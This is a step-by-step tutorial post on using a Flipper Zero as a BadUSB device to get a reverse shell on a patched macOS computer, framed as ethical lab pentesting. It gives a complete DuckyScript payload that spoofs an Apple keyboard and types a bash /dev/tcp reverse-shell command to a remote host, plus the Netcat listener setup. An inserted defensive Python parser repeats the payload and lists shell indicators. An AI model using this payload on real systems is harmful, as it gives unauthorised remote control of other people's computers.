Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server, I was able to gain a shell on my fully patched, up-to-date macOS Ventura computer.

In my lab environment, I use the Flipper Zero as a pentesting device to test for vulnerabilities in my servers and desktop systems.

The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback.

> This article is an example of how to use the Flipper Zero as an ethical pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software.

## BadUSB Payloads

The Flipper Zero BadUSB, as well as several other BadUSB devices, uses payloads written in DuckyScript, a simple scripting language for performing keystrokes that results in a keyboard injection attack.

A good starting reference point for DuckyScript payloads is the official Hak5 website: <https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky>. Here you will find examples and documentation for using DuckyScript.

## Let’s Write Some DuckyScript

You can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough.

Use your favorite text editor and enter the following text.
The macOS has the TextEdit application installed by default, so we’ll use that.

```
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
```

For this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over only the few commands that our script uses. There are really only six different commands.

| Command | Description |
|----|----|
| `ID 05ac:021e Apple:Keyboard` | Tells macOS that our Flipper Zero is really an Apple keyboard. Without this line, macOS displays the Keyboard Setup Assistant dialog, which causes the script to fail. |
| `DELAY` | Pauses the script for a period of time before the next command. Without these delays the script runs too fast and fails. |
| `GUI SPACE` | Presses the Apple Command key and the Space bar to open the Spotlight Search window. |
| `STRING terminal` | Types the string ‘terminal’ into the Spotlight Search window. |
| `ENTER` | Presses the ENTER or Return key. After this keypress, macOS launches the Terminal window (/Applications/Utilities/Terminal). |
| `STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1` | Types this command into the Terminal window, which establishes a connection to the Netcat server listening at 10.10.10.157 on port 4444. |

Change the IP address **10.10.10.157** and port **4444** to your server’s IP address and port.

Save this file to your disk as **rev_shell_macos.txt**.
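For anyone reviewing payload files recovered from a BadUSB device, here is an added Python example (not part of the original article or the Flipper Zero project) that parses the DuckyScript format described in the table above, sums the DELAY values, records the spoofed keyboard ID, and flags STRING lines that would open a network shell. The indicator list is an assumption, and the sample payload is the article's script embedded as a constructed string.

```python
# Added example, not from the original article or the Flipper Zero project: a
# defender-side triage parser for DuckyScript payload files. It executes nothing;
# it only summarises what the keystrokes would do if the device were plugged in.
import re
from dataclasses import dataclass, field

# Substrings suggesting a typed command opens a network shell. Assumption: a
# starter list derived from the article's payload, not an exhaustive one.
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "nc ", "ncat ", "curl ", "| sh")
DEV_TCP = re.compile(r"/dev/tcp/([\d.]+)/(\d+)")  # bash's built-in TCP redirection

@dataclass
class Report:
    spoofed_id: str = ""          # vendor:product the device claims to be
    total_delay_ms: int = 0       # sum of all DELAY values
    flagged: list = field(default_factory=list)    # (typed text, matched indicators)
    callbacks: list = field(default_factory=list)  # (host, port) parsed from /dev/tcp/

def triage(script: str) -> Report:
    """Walk a DuckyScript file line by line and summarise what it would do."""
    report = Report()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):   # REM lines are comments
            continue
        cmd, _, arg = line.partition(" ")        # keyword, then its argument
        if cmd == "ID":
            report.spoofed_id = arg.strip()
        elif cmd == "DELAY":
            report.total_delay_ms += int(arg)
        elif cmd == "STRING":                    # text typed into the focused window
            hits = [ind for ind in SHELL_INDICATORS if ind in arg]
            if hits:
                report.flagged.append((arg, hits))
            for host, port in DEV_TCP.findall(arg):
                report.callbacks.append((host, int(port)))
    return report

# Constructed sample: the twelve-line payload from the walkthrough above.
SAMPLE = """\
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
"""
```

Running `triage(SAMPLE)` reports the spoofed Apple keyboard ID, 4400 ms of scripted delay, one flagged STRING line, and a callback to 10.10.10.157:4444.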
There is no subdirectory organization under the **badusb** directory on the Flipper Zero, so if you keep multiple payloads for different operating systems, use a naming convention that tells you what each file does.

## Installing the qFlipper Application

If you haven’t installed the qFlipper application yet, go to the official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but at the bottom are links to install the qFlipper application.

<https://flipperzero.one/update>

Follow the instructions for your operating system to install the qFlipper application.

## Getting the DuckyScript Onto the Flipper Zero

Open the qFlipper application and select the folder icon highlighted in red.

![](https://cdn.hackernoon.com/images/-b3a3tme.png)

Select and double-click the **SD Card** icon to view its contents.

![](https://cdn.hackernoon.com/images/-ejc3tdn.png)

Locate the **rev_shell_macos.txt** file we created earlier and drag it onto the **badusb** folder.

![](https://cdn.hackernoon.com/images/-en93tei.png)

Remove the Flipper Zero from your computer when the file is done copying.

## Waiting for a Reverse Shell

The Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command:

`$ nc -nlvp 4444`

The breakdown of the command is listed in the following table.
Again, you don’t really need to know what’s going on with this command, other than that it’s waiting for an incoming connection.

| Command | Description |
|----|----|
| **nc** | Netcat command |
| **-nlvp** | (**n**) no DNS resolution, (**l**) listen for an incoming connection, (**v**) verbose output, (**p**) port |
| **4444** | Port number to listen on |

![](https://cdn.hackernoon.com/images/-r0a3tsx.png)

Now that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.

## Starting the BadUSB Reverse Shell

The hard part is done. The Flipper Zero BadUSB **rev_shell_macos.txt** file is written, moved to the Flipper Zero, and the Netcat listener is waiting for a connection.

Locate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet; the Flipper Zero will let you know when it’s time to connect the device.

![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-4la3tbw.png)

Navigate to the DuckyScript file we copied in the previous step. If you don’t see the file, you either copied it to the wrong directory or did not use the .txt filename extension. Select **rev_shell_macos** and click the Run button.

![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-h3b3tcy.png)

When you see the **Connect to USB** alert, connect your Flipper Zero to your iMac or MacBook’s USB port and click the Run button.

![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-cgc3trn.png)

You can watch the progress of your BadUSB script in the main window. Once the status reaches 100%, the payload is complete and you can remove the Flipper Zero.

![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-24d3tsc.png)

If you are watching the iMac’s monitor, you can see the exploit as it executes the DuckyScript.
The Netcat listener on our Ubuntu server displays the result of the successful connection.

## Control of Your Computer

You now have control of the macOS computer through a reverse shell. Because it runs on a version of BSD Linux, you can use Unix command-line tools and a Bash shell as if you were sitting at the physical iMac’s keyboard.

![](https://cdn.hackernoon.com/images/-2fc3tpp.png)

You can use regular Linux commands like **whoami**, **pwd**, **ls**, or **cd** to navigate the filesystem and manipulate the operating system.

![](https://cdn.hackernoon.com/images/-cdg3tid.png)

## Next Steps

Now that you understand how the Flipper Zero operates as a BadUSB device, you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own DuckyScript files.

Operate legally and ethically. Use this tool only on devices that you own or have permission to use.